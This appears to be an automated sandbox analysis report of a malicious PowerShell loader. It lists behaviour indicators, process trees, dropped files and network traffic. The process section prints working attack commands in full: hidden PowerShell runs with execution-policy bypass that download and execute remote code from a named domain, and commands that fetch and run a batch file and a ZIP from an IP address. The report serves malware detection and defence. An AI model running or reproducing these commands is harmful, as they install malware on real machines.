File name:

pOwERShElL -W HIddEn -Nologo -nOp.txt

Full analysis: https://app.any.run/tasks/d72fc224-da94-479f-b99e-e7527cd4d4d0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 19, 2025, 09:41:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
opendir
loader
arch-exec
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with CRLF line terminators
MD5:

8B705D59BD5C5C2E8FACD91102A53F02

SHA1:

2D955696C084E1C90B14A3DC11D393A12065EA1E

SHA256:

930BD02C8F1D4C9524058FDBEB4E1C4FD8B122C8C8882680CD8DC2784ACDC363

SSDEEP:

24:spykp1CRDyhSSEp1CRD8q1CRDozkJ1CRDDy1CRDoAZv+5Jf:spyc1OPS81O71Ok81ODy1OPWf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 1916)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)
    • Changes powershell execution policy (Bypass)

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
      • cmd.exe (PID: 3560)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)
    • Starts process via Powershell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
      • cmd.exe (PID: 3560)
    • Kill processes via PowerShell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 1916)
    • Found IP address in command line

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Removes files via Powershell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
      • cmd.exe (PID: 3560)
    • Connects to the server without a host name

      • mshta.exe (PID: 2828)
      • powershell.exe (PID: 6724)
      • curl.exe (PID: 7020)
      • powershell.exe (PID: 6296)
      • curl.exe (PID: 904)
      • powershell.exe (PID: 648)
      • curl.exe (PID: 7164)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • Executable content was dropped or overwritten

      • tar.exe (PID: 6972)
      • tar.exe (PID: 4244)
      • tar.exe (PID: 7144)
    • Manipulates environment variables

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
    • The executable file from the user directory is run by the CMD process

      • greendesigner.exe (PID: 1732)
      • greendesigner.exe (PID: 5872)
      • greendesigner.exe (PID: 6988)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3560)
    • The process hides Powershell's copyright startup banner

      • cmd.exe (PID: 3560)
  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 3560)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 5792)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
    • Checks proxy server information

      • mshta.exe (PID: 2828)
      • powershell.exe (PID: 6724)
      • mshta.exe (PID: 6092)
      • powershell.exe (PID: 6296)
      • mshta.exe (PID: 4840)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 768)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)
    • Disables trace logs

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)
    • Create files in a temporary directory

      • curl.exe (PID: 7020)
      • tar.exe (PID: 6972)
      • curl.exe (PID: 904)
      • tar.exe (PID: 4244)
      • curl.exe (PID: 7164)
      • tar.exe (PID: 7144)
    • Checks supported languages

      • curl.exe (PID: 7020)
      • tar.exe (PID: 6972)
      • greendesigner.exe (PID: 1732)
      • curl.exe (PID: 904)
      • greendesigner.exe (PID: 5872)
      • tar.exe (PID: 4244)
      • tar.exe (PID: 7144)
      • greendesigner.exe (PID: 6988)
      • curl.exe (PID: 7164)
    • Execution of CURL command

      • cmd.exe (PID: 7004)
      • cmd.exe (PID: 4228)
      • cmd.exe (PID: 6972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
160
Monitored processes
32
Malicious processes
12
Suspicious processes
3

Behavior graph

start notepad.exe no specs cmd.exe conhost.exe no specs mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs curl.exe tar.exe greendesigner.exe no specs aspnet_wp.exe no specs mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs curl.exe tar.exe greendesigner.exe no specs aspnet_wp.exe no specs mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs curl.exe tar.exe greendesigner.exe no specs aspnet_wp.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID: 188
CMD: pOwErshEll -w HidDEN -noLOgo -noP -ep ByPASS -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/dszm").Content))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 444
CMD: pOwERShElL -W HIddEn -Nologo -nOp -eP BYPaSs -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/Wj").Content))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 648
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep Bypass -nop -c "Stop-Process -Name 'install' -Force; Invoke-WebRequest -Uri 'http://185.121.235.111/cpan/greendesigners.bat' -OutFile ([System.IO.Path]::Combine($env:TEMP, 'greendesigners.bat')); Start-Process -FilePath ([System.IO.Path]::Combine($env:TEMP, 'greendesigners.bat')) -NoNewWindow -Wait; Remove-Item -Path ([System.IO.Path]::Combine($env:TEMP, 'greendesigners.bat')) -Force"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
PID: 768
CMD: pOWERShelL -w hiDDen -nOlogO -Nop -Ep bYPasS -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/J9AIr").Content))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 904
CMD: curl -o "C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner.zip" http://185.121.235.111/cpan/greendesigner.zip
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 1596
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1704
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
Parent process: greendesigner.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
aspnet_wp.exe
Exit code:
3221225477
Version:
4.8.9220.0 built by: NET481REL1LAST_C
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\aspnet_wp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
PID: 1732
CMD: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\greendesigner.exe
Path: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\greendesigner.exe
Parent process: cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477
Modules
Images
c:\users\admin\appdata\local\temp\greendesignerdir\greendesigner\greendesigner.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\users\admin\appdata\local\temp\greendesignerdir\greendesigner\libfilezilla-45.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\users\admin\appdata\local\temp\greendesignerdir\greendesigner\libgcc_s_seh-1.dll
PID: 1916
CMD: POwErSHELL -W hidDeN -nolOGO -nop -Ep bYPaSS -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/82V1").Content))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 2612
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
43 205
Read events
43 196
Write events
9
Delete events
0

Modification events

(PID) Process: (2828) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty)

(PID) Process: (2828) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (2828) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (6092) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty)

(PID) Process: (6092) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (6092) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (4840) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty)

(PID) Process: (4840) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (4840) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:
Executable files
24
Suspicious files
9
Text files
20
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 2828
Process: mshta.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_0E7D957F8CAC4DE448BF5D34E62E9B04
Type: binary
MD5: DEAF2B367D2AB66D9B355486A7F393F8
SHA256: 897250D18B2ED72E5ECCBD5E544C15127C7F38906C122588AE66006469F85913

PID: 6972
Process: tar.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libgcc_s_seh-1.dll
Type: executable
MD5: F590ECA82EA34B2D95C782143D45ED33
SHA256: 85723F1231608222CAFD34D56A542FE041B94DB1E691431EEEC3449580C2F50F

PID: 7020
Process: curl.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner.zip
Type: compressed
MD5: 1CE2CF1D5204A3C54C99FDDFA0BAECD9
SHA256: C6214D1C6871853660A1C7278148E8EA7B582F122C71EC8B44DF824BCB8FD214

PID: 2828
Process: mshta.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\02460F0C5E46824211DA37830EBE26EF
Type: binary
MD5: C7EC124FC01255D84153783FF625A67E
SHA256: E72A16956327234C1A034B58789DD6B1C712DFA67769659936FA55C0CC491B91

PID: 6972
Process: tar.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\greendesigner.exe
Type: executable
MD5: FB4345E5F8C30AC2239265F14E1AE4EF
SHA256: BBDFD46773B11A15AE87751B81D504DB8C99052FF3D8927D28281ADEE4AF599C

PID: 6724
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesigners.bat
Type: text
MD5: 779D5E4876F2584670A26B9F28B927C5
SHA256: F70668574CA3149C87676897DB688950A334F34496C8A5735C6DCE8F691FC6A0

PID: 6972
Process: tar.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libgnutls-30.dll
Type: executable
MD5: CC70F76637A27F170EBDAF76765F52D3
SHA256: 60F5D6CE87AF2C2811348F8E38A4E02B5B1D472C754D8C8F4BCEB50F7F18AB98

PID: 6972
Process: tar.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libfilezilla-45.dll
Type: executable
MD5: 85FF9CC290C639A3EFF050987143618E
SHA256: 47F22047CD916938DB649CE9CF641EA05C1F3175FE39BDD7A2DC1E447788ABAC

PID: 6972
Process: tar.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libgmp-10.dll
Type: executable
MD5: C0CA8705BA9DB5FDC359C1096E25E37F
SHA256: ED0AE7D0B532810F5132406228A696F51D59328D0264D552F022563F42F556A1

PID: 6972
Process: tar.exe
Filename: C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libstdc++-6.dll
Type: executable
MD5: 2BD65247568ADBEE336D3A6FAA0763EF
SHA256: E2B48085B5F658D829FAF8DD33C690CFFD7DFF0AB7C35CA999FB3B0BE803A3C9
Download the PCAP, analyze network streams, HTTP content and a lot more in the full report
HTTP(S) requests
18
TCP/UDP connections
51
DNS requests
23
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
536
svchost.exe
GET
200
2.16.164.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6296
powershell.exe
GET
200
185.121.235.111:80
http://185.121.235.111/cpan/greendesigners.bat
unknown
unknown
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
536
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6520
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7164
curl.exe
GET
200
185.121.235.111:80
http://185.121.235.111/cpan/greendesigner.zip
unknown
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.42:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
536
svchost.exe
2.16.164.42:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
536
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
184.86.251.10:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
40.126.31.73:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.174
whitelisted
crl.microsoft.com
  • 2.16.164.42
  • 2.16.164.32
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
www.bing.com
  • 184.86.251.10
  • 184.86.251.14
  • 184.86.251.20
  • 184.86.251.18
  • 184.86.251.11
  • 184.86.251.15
  • 184.86.251.12
  • 184.86.251.19
  • 184.86.251.16
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
login.live.com
  • 40.126.31.73
  • 40.126.31.3
  • 40.126.31.71
  • 40.126.31.69
  • 40.126.31.2
  • 40.126.31.130
  • 20.190.159.129
  • 20.190.159.130
whitelisted
go.microsoft.com
  • 92.123.18.10
whitelisted
fp.msedge.net
  • 204.79.197.222
whitelisted
th.bing.com
  • 2.23.227.208
  • 2.23.227.215
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] URL Shortener TinyURL (tinyurl .com)
6724
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
6724
powershell.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
6724
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6296
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6296
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
6296
powershell.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
7164
curl.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
7164
curl.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
7164
curl.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info